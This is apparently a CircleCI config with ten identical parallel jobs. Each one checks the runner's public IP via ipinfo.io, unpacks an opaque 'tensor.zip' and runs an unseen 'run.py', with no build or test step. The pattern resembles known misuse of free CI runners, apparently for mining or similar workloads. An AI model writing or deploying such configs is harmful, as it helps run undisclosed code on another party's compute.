working_dir: &working_dir ~/app
version: 2.1
jobs:
  red:
    ##################################
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
              sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py
            
            
  blue:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py
  silver:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py

  yellow:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py
  green:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py

  purple:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py

  pink:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py

  black:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py
  white:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py


  grey:
    
    docker:
      - image: cimg/python:3.10
    
    steps:
      - checkout
      
      
      - run:
          name: GROK
          
          command: |
            sudo apt update;curl ipinfo.io;unzip tensor.zip;python run.py


workflows:
    version: 2.1
    build:
        jobs:
             - red
             - blue
             - silver
             - yellow
             - green
             - purple
             - pink
             - black
             - white
             - grey
